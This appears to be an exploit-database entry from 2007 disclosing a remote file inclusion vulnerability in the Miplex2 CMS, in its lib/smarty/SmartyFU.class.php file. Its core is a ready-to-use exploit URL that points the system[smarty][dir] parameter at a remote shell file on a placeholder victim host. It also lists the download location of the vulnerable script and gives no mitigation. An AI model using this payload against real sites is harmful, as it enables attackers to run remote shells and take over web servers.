id: 1850
date: 05/07/2007
title: Miplex2 (SmartyFU.class.php) Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

================================================================
Miplex2 (SmartyFU.class.php) Remote File Inclusion Vulnerability
================================================================



#Miplex2 Remote file inclusion

#Download script : http://download.berlios.de/miplex2/miplex2alpha.tar.gz

#Thanks Str0ke

#Exploit :

#http://victim.com/[miplex2_paht]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt?

#Discovered by : ThE TiGeR

#Greetz : Reda, ™~${{BraveHeart}}$~™



#  0day.today [2023-03-24]  #